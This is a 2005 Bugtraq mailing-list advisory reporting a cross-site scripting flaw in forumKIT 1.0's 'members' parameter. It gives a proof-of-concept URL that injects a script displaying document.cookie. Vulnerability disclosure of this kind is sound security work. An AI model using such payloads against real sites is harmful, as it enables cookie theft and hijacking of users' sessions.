[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    XSS Vulnerability in ForumKIT
From:       tom cruise <the.n3t () gmail ! com>
Date:       2005-01-13 11:17:00
Message-ID: 20050113111700.12211.qmail () www ! securityfocus ! com
[Download RAW message or body]



Vulnerable System :
forumKIT 1.0

Description : 
an XSS is founded in the variable members that have the value 'true'
you can exchange it with XSS Code .

exploit : 
http://forum.target.com/f.aspx?members=">&lt;script&gt;alert(document.cookie);&lt;/script&gt;

this exploit is discovered by : neO
e-mail : al_modamer@hotmail.com
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic